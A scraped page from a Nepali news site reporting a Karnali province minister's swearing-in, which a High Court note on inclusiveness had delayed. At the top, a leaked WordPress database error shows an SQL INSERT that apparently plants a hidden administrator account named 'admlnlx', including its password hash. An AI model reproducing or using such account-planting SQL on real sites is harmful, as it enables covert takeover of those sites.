WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUfmQdny6YH1v1e7tR0.3730.twruj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:58:17', '', 'admlnlx', 'admlnlx')

मन्त्री शाहीद्वारा शपथ – Gaule Khabar

मन्त्री शाहीद्वारा शपथ

मन्त्री शाहीद्वारा शपथ

काठमाण्डौ । कर्णाली सरकारका नवनियुक्त उद्योग, पर्यटन, वन तथा वातावरणमन्त्री वीरबहादुर शाहीले आज पद तथा गोपनीयताको शपथ लिनुभएको छ । कर्णाली प्रदेशका प्रदेश प्रमुख तिलक परियारले आज उहाँलाई शपथ गराए ।

शाही डोल्पा प्रदेश निर्वाचन क्षेत्र ९ख० बाट निर्वाचित सांसद हुनुहुन्छ । शाहीलाई गत बिहीबार मुख्यमन्त्री जीवनबहादुर शाहीले मन्त्री नियुक्त गर्नुभएको थियो । यसअघि विसं २०७८ माघ २३ गते उद्योगमन्त्री बनेका हुम्लाका गैरसांसद छिरिङ डम्डुल लामा ९कार्चेन० को पदावधि सकिएपछि लामाको ठाउँमा शाहीलाई नियुक्त गरिएको हो ।

उहाँलाई शुक्रबार नै शपथ गराउने कार्यक्रम भए पनि उच्च अदालत सुर्खेतले मन्त्रिपरिषद् पुनर्गठन गर्दा संविधानको मर्मअनुसार समावेशिता कायम नभएको भन्दै प्रदेश प्रमुख र मुख्यमन्त्री कार्यालयलाई ध्यानाकर्षण गराएपछि शपथको तालिका रोकिएको थियो ।

गत माघमा बनेको मुख्यमन्त्री शाही नेतृत्वको सरकार समावेशी सिद्धान्तविपरीत भएको भन्दै उच्च अदालत सुर्खेतमा रिट दायर भएको थियो । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका